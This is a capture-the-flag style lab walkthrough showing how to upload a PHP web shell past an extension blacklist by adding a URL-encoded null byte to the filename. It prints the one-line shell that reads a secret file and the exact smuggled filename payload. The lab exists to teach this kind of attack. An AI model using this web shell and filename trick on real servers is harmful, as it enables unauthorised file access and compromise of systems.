Web shell upload via obfuscated file extension
Description
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.
Reproduction and proof of concept
Log in and upload an image as your avatar, then go back to your account page.
In Burp, go to Proxy -> HTTP history and notice that your image was fetched using a
GET
request to/files/avatars/<YOUR-IMAGE>
.Send this request to Burp Repeater. On your system, create a file called
exploit.php
, containing a script for fetching the contents of Carlos’s secret. For example:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Attempt to upload this script as your avatar. The response indicates that you are only allowed to upload JPG and PNG files.
Sorry, only JPG & PNG files are allowed Sorry, there was an error uploading your file.
� Back to My Account
In Burp’s proxy history, find the
POST /my-account/avatar
request that was used to submit the file upload. Send this to Burp Repeater.In Burp Repeater, go to the tab for the
POST /my-account/avatar
request and find the part of the body that relates to your PHP file. In theContent-Disposition
header, change the value of thefilename
parameter to include a URL encoded null byte, followed by the.jpg
extension:filename="exploit.php%00.jpg"
Send the request:
The file was successfully uploaded. Notice that the message refers to the file as exploit.php
, suggesting that the null byte and .jpg
extension have been stripped.
Switch to the other Repeater tab containing the
GET /files/avatars/<YOUR-IMAGE>
request. In the path, replace the name of your image file withexploit.php
and send the request. Observe that Carlos’s secret was returned in the response.
Submit the secret to solve the lab.
Exploitability
An attacker will need to log in to wiener:peter
; upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret
; and then enter this secret using the button provided in the lab banner.